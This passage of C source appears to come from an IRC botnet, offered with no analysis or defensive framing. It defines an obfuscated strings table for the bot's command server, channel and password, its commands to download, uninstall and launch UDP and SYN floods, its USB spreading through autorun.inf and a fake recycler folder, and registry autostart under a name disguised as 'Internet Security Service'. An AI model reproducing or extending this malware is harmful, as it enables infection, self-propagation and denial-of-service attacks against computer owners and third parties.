/ first parameter is string, second one is either:
// 1 = string is already decoded
// 0 = string is encoded and needs to be decoded before usage
strings_s strings[] =
{
	/**************CONFIG-MAIN****************/
	#define s_decodekey 0
	{"\xCB\x95\x99\x95", 0},
	#define s_filename 1
	{"\xC4\xDE\xC8\x9E\x9F\x83\xC8\xD5\xC8", 0},
	#define s_mutex 2
	{"\xCC\xDE\xC9\x80\x9B\x86\x9D\x94\x99\x94\x94\x9A\xF2", 0},
	#define s_autostartkey 3
	{"\xD6\x9F\x95\xEC\xEF\xEE\x98\xEE\x9D\x80\x99\xEB\xEE\xEF\x80\x9C\x9C\xEE\xEB\x80\xEC\xEC\xF5\x98\x80\x95\x9C\xEE\xF5\x9C\xEE\x9B\x9E\x98\x9B\x9C\x9F\xD0", 0},
	#define s_botversion 4
	{"\x9C\x83\x99\x83\x9D", 0},
	#define s_ircorderprefix 5
	{"\x8C", 0},
	#define s_masterhost 6
	{"\xCC\xC9\xC0\xC4\xC3", 0},
	#define s_password 7
	{"\xD9\xDF\xCF\x9C\x9F\x9E\xD9\xDF\xCF", 0},
	#define s_channel 8
	{"\x8E\xD5\x9D\xDF\x8E", 0},
	#define s_channelpass 9
	{"\xD9\xDF\xCF\x9C\x9F\x9E\xD9\xDF\xCF", 0},
	#define s_channel_usb 10
	{"\x8E\xD8\xDE\xCF", 0},
	/**************CONFIG-ORDERS****************/
	#define s_order_version 11
	{"\xDB", 0},
	#define s_order_die 12
	{"\xEF\xE1\xEC\xE5", 0},
	#define s_order_r 13
	{"\xDF", 0},
	#define s_order_r2 14
	{"\xFC\xEA\xFF\xFF\xFF", 0},
	#define s_order_remove 15
	{"\xE6\xE2\xFE\xE2\xE0\xEC\xE6\xF4\x99\xE9", 0},
	#define s_order_dl 16
	{"\xE3\xEC\xF7\xE8\xE1\xD5\x9D\xDF", 0},
	#define s_order_join 17
	{"\xC7", 0},
	#define s_order_part 18
	{"\xDD", 0},
	/**************IRC STRINGS****************/
	#define s_pass 19
	{"\xFD\xEC\xFE\xFE\x8D", 0},
	#define s_nick 20
	{"\xE3\xE4\xEE\xE6\x8D\xFB\xC4\xDF\xD8\xDE\x80", 0},
	#define s_user 21
	{"\xF8\xFE\xE8\xFF\x8D", 0},
	#define s_usermid1 22
	{" \"\" \"", 1},
	#define s_usermid2 23
	{"\" :", 1},
	#define s_motd 24
	{"\xE0\xE2\xF9\xE9", 0},
	#define s_ping 25
	{"\xFD\xE4\xE3\xEA", 0},
	#define s_pong 26
	{"\xFD\xE2\xE3\xEA\x8D", 0},
	#define s_join 27
	{"\xE7\xE2\xE4\xE3\x8D", 0},
	#define s_part 28
	{"\xFD\xEC\xFF\xF9\x8D", 0},
	#define s_privmsg 29
	{"\xFD\xFF\xE4\xFB\xE0\xFE\xEA", 0},
	#define s_332 30
	{"\x9E\x9E\x9F", 0},
	#define s_433 31
	{"\x99\x9E\x9E", 0},
	#define s_dbldot 32
	{" :", 1},
	#define s_newline 33
	{"\r\n", 1},
	#define s_space 34
	{" ", 1},
	#define s_usb_infect 35
	{"\xAE\x9D\x81\x9C\xAF\xFB\xC4\xDF\xD8\xDE\x8D\xE2\xDA\xC3\x9E\xC9\x8D\xAE\x9D\xF8\xFE\xEF\x8D\xE9\xDF\xC4\xDB\xC8\xDF\xAE\x99\x8D", 0},
/**************DOWNLOADER STRINGS****************/
	#define s_internetopen 36
	{"\xE0\xC2\xD7\xC4\xC1\xC1\xCC", 0},
	#define s_success 37
	{"\xFE\xD8\xCE\xCE\xC8\xDE\xDE\x83", 0},
	#define s_failed 38
	{"\xEB\xCC\xC4\xC1\xC8\xC9\x83", 0},
	/**************USB-SPREAD STRINGS****************/
	#define s_usb_recycler 39
	{"\xF1\xFF\xE8\xFE\xF9\xE2\xFF\xE8", 0},
	#define s_usb_recsubdir 40
	{"\xF1\xFE\x80\x9C\x80\x98\x80\x9F\x9C\x80\x9C\x99\x95\x9F\x99\x9A\x9B\x98\x9D\x9C\x80\x9C\x9B\x99\x99\x99\x94\x9C\x94\x9E\x9A\x80\x9B\x95\x9F\x9D\x9D\x9E\x9E\x9E\x9D\x80\x9C\x9D\x9C\x9E", 0},
	#define s_usb_desktopinidata 41
	{"\xF6\x83\xFE\xC5\xC8\xC1\xC1\xEE\xC1\xCC\xDE\xDE\xE4\xC3\xCB\xC2\xF0\xA7\xEE\xE1\xFE\xE4\xE9\x90\xD6\x9B\x99\x98\xEB\xEB\x9D\x99\x9D\x80\x98\x9D\x95\x9C\x80\x9C\x9D\x9C\xEF\x80\x94\xEB\x9D\x95\x80\x9D\x9D\xEC\xEC\x9D\x9D\x9F\xEB\x94\x98\x99\xE8\xD0", 0},
	#define s_usb_desktopini 42
	{"\xF1\xE9\xC8\xDE\xC6\xD9\xC2\xDD\x83\xC4\xC3\xC4", 0},
	#define s_usb_autoruninf 43
	{"\xF1\xCC\xD8\xD9\xC2\xDF\xD8\xC3\x83\xC4\xC3\xCB", 0},
	#define s_usb_autorundata1 44
	{"\xF6\xCC\xD8\xD9\xC2\xDF\xD8\xC3\xF0\xA7\xC2\xDD\xC8\xC3\x90", 0},
	#define s_usb_autorundata2 45
	{"\xA7\xC4\xCE\xC2\xC3\x90\x88\xFE\xD4\xDE\xD9\xC8\xC0\xFF\xC2\xC2\xD9\x88\xF1\xDE\xD4\xDE\xD9\xC8\xC0\x9E\x9F\xF1\xFE\xE5\xE8\xE1\xE1\x9E\x9F\x83\xC9\xC1\xC1\x81\x99\xA7\xCC\xCE\xD9\xC4\xC2\xC3\x90\xE2\xDD\xC8\xC3\x8D\xCB\xC2\xC1\xC9\xC8\xDF\x8D\xD9\xC2\x8D\xDB\xC4\xC8\xDA\x8D\xCB\xC4\xC1\xC8\xDE\xA7\xDE\xC5\xC8\xC1\xC1\xF1\xC2\xDD\xC8\xC3\x90\xE2\xDD\xC8\xC3\xA7\xDE\xC5\xC8\xC1\xC1\xF1\xC2\xDD\xC8\xC3\xF1\xCE\xC2\xC0\xC0\xCC\xC3\xC9\x90", 0},
	#define s_usb_autorundata3 46
	{"\xA7\xDE\xC5\xC8\xC1\xC1\xF1\xC2\xDD\xC8\xC3\xF1\xC9\xC8\xCB\xCC\xD8\xC1\xD9\x90\x9C", 0},
	/**************INSTALL STRINGS****************/
	#define s_c 47
	{"c:", 1},
	#define s_dblslash 48
	{"\\", 1},
	/**************AUTOSTART STRINGS****************/
	#define s_autostartreg 49
	{"\xFE\xC2\xCB\xD9\xDA\xCC\xDF\xC8\xF1\xE0\xC4\xCE\xDF\xC2\xDE\xC2\xCB\xD9\xF1\xEC\xCE\xD9\xC4\xDB\xC8\x8D\xFE\xC8\xD9\xD8\xDD\xF1\xE4\xC3\xDE\xD9\xCC\xC1\xC1\xC8\xC9\x8D\xEE\xC2\xC0\xDD\xC2\xC3\xC8\xC3\xD9\xDE", 0},
	#define s_stubpath 50
	{"\xFE\xD9\xD8\xCF\xFD\xCC\xD9\xC5", 0},
	#define s_autostartreg_guestacc 51
	{"\xFE\xC2\xCB\xD9\xDA\xCC\xDF\xC8\xF1\xE0\xC4\xCE\xDF\xC2\xDE\xC2\xCB\xD9\xF1\xFA\xC4\xC3\xC9\xC2\xDA\xDE\xF1\xEE\xD8\xDF\xDF\xC8\xC3\xD9\xFB\xC8\xDF\xDE\xC4\xC2\xC3\xF1\xFF\xD8\xC3", 0},
	#define s_autostartreg_def 52
	{"Internet Security Service", 1},
	/**************MISC****************/
	#define s_order_silent 53
	{"\xD5", 0},
	#define s_star 54
	{"\x87", 0},
	#define s_ddos_start 55
	{"\xEC\xD9\xD9\xCC\xCE\xC6\xC4\xC3\xCA\x83", 0},
	#define s_ddos_end 56
	{"\xEC\xD9\xD9\xCC\xCE\xC6\x8D\xEE\xC2\xC0\xDD\xC1\xC8\xD9\xC8\xC9", 0},
	#define s_order_ddos_udp 57
	{"\xD8\xC9\xDD", 0},
	#define s_order_ddos_syn 58
	{"\xDE\xD4\xC3", 0},
	#define s_order_ddos_stop 59
	{"\xCB\xDE\xD9\xC2\xDD", 0},
	#define laststring 60
	{NULL, 0}